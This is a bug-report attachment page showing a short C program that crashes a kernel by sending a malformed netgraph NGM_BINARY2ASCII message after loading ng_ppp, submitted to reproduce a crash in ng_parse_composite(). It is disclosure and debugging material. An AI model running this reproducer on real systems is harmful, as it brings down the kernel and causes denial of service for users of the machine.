Attachment 237614 Details for Bug 267334 – provoke a crash in netgraph ng_parse_composite()

provoke a crash in netgraph ng_parse_composite()

ng12a.c (text/plain), 1.24 KB, created by Robert Morris on 2022-10-25 13:10:36 UTC

(hide)

Description:

Filename:

MIME Type:

Creator: Robert Morris

Created: 2022-10-25 13:10:36 UTC

Size: 1.24 KB

patch

obsolete

>#include <stdio.h>
>#include <string.h>
>#include <stdlib.h>
>#include <unistd.h>
>#include <sys/socket.h>
>#include <sys/ioctl.h>
>#include <netinet/in.h>
>#include <sys/wait.h>
>#include <sys/resource.h>
>#include <arpa/inet.h>
>#include <assert.h>
>#include <ctype.h>
>#include <fcntl.h>
>#include <signal.h>
>#include <netgraph/ng_message.h>
>#include <netgraph/ng_socket.h>
>#include <netgraph.h>
>
>int
>main(){
>  system("kldload netgraph");
>  system("kldload ng_ppp");
>
>  int cs = -1;
>  int ds = -1;
>  NgMkSockNode(NULL, &cs, &ds);
>
>  struct ngm_mkpeer mkp;
>  memset(&mkp, 0, sizeof(mkp));
>  strcpy(mkp.type, "ppp");
>  strcpy(mkp.ourhook, "hook");
>  strcpy(mkp.peerhook, "atalk");
>
>  if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE,
>                NGM_MKPEER, &mkp, sizeof(mkp)) < 0) {
>    fprintf(stderr, "netgraph mkpeer %s %s failed\n", mkp.type, mkp.peerhook);
>  }
>
>  char *path = ".:";
>  int cmd = NGM_BINARY2ASCII;
>
>  char arg[128];
>  memset(arg, 0xff, sizeof(arg));
>  *(long long *)(arg + 0) = 0x48ffffffff;
>  *(int *)(arg + 8) = NGM_LISTNAMES; // hdr cmd
>  *(int *)(arg + 12) = 0xffffffff; // hdr flags
>  *(int *)(arg + 16) = 0xffffffff; // hdr token
>  *(int *)(arg + 20) = NGM_GENERIC_COOKIE; // hdr cookie
>
>  NgSendMsg(cs, path, NGM_GENERIC_COOKIE, cmd, arg, sizeof(arg));
>}

Actions: View

Attachments on bug 267334: 237614